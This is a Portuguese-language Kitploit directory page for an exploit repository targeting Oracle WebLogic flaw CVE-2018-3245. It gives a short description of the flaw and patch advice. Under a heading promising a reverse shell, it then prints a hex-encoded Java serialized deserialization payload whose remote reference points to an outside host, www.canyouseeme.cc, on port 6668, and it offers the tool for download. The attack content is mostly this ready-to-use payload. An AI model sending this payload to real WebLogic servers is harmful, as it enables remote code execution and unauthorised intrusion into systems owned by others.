Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-3245 — CVE-2018-3245 | Kitploit
Ferramentas/GitHubGitHub/jas502n/cve-2018-3245
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubjas502n/cve-2018-3245

CVE-2018-3245

CVE-2018-3245

Ver Repositório
1410há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Weblogic-CVE-2018-3245

CVE-2018-3245

0x00 Introdução

No dia 16 de outubro, horário local, e na madrugada do dia 17 de outubro, horário de Pequim, a Oracle lançou oficialmente a Atualização Crítica de Patch (CPU) de outubro (terceiro trimestre),

que corrigiu uma vulnerabilidade de execução remota de código no Weblogic (CVE-2018-2893) que não foi completamente corrigida na atualização de CPU de julho (segundo trimestre). O novo ID da vulnerabilidade corrigida é CVE-2018-3245.

Solução

A Oracle já corrigiu essa vulnerabilidade nesta Atualização Crítica de Patch (CPU) e recomenda fortemente que os usuários afetados atualizem o mais rápido possível para se proteger.

Nota: O patch oficial da Oracle exige que o usuário possua uma conta de licença de software original. Após fazer login com essa conta em https://support.oracle.com, é possível baixar o patch mais recente.

Link oficial da CPU da Oracle:

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

0x01 Obter shell reverso

root@kitploit:~
jas502n-poc.txt 

Payload(hex): aced00057372002f636f6d2e73756e2e6a6e64692e726d692e72656769737472792e5265666572656e6365577261707065725f5374756200000000000000020200007872001a6a6176612e726d692e7365727665722e52656d6f746553747562e9fedcc98be1651a0200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e0300007870773b000a556e696361737452656600127777772e63616e796f757365656d652e636300001a0c0000000009e0b68e00000000000000000000000000000078

Baixar ferramenta